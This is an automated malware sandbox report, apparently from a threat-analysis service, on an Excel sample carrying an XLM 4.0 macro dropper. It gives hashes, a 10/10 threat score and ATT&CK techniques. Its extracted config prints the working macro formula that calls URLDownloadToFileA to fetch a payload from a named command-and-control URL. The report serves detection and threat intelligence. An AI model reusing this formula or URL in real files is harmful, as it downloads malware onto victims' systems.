Overview

overview

10

Static

static

10

db51470283...c3.xls

windows7_x64

10

db51470283...c3.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5527146056155136.zip

  • Size

    11KB

  • Sample

    210308-k7xk81e2rs

  • MD5

    bda336dfdf5f1db4824bbe1650f7b7cc

  • SHA1

    6767e6b4ea3f2df27fa645af10424e86b8ab4041

  • SHA256

    bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0

  • SHA512

    e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://xjw10whta03ytgdi.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://xjw10whta03ytgdi.com/inda.xls

Targets

    • Target

      db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3

    • Size

      39KB

    • MD5

      9ef3b3a010179316440db44abbd34e90

    • SHA1

      a5419ce2f80ce760bdf4a7bddd65df4a8a917123

    • SHA256

      db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3

    • SHA512

      89f2379072f6f049e3affa1858d745313a1a438cffe9d47489d55731f9004c921e5b0c44da0f2bbc1f9c49424e8cc4dac44cec65603c0fe059ff32a58298ee41

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks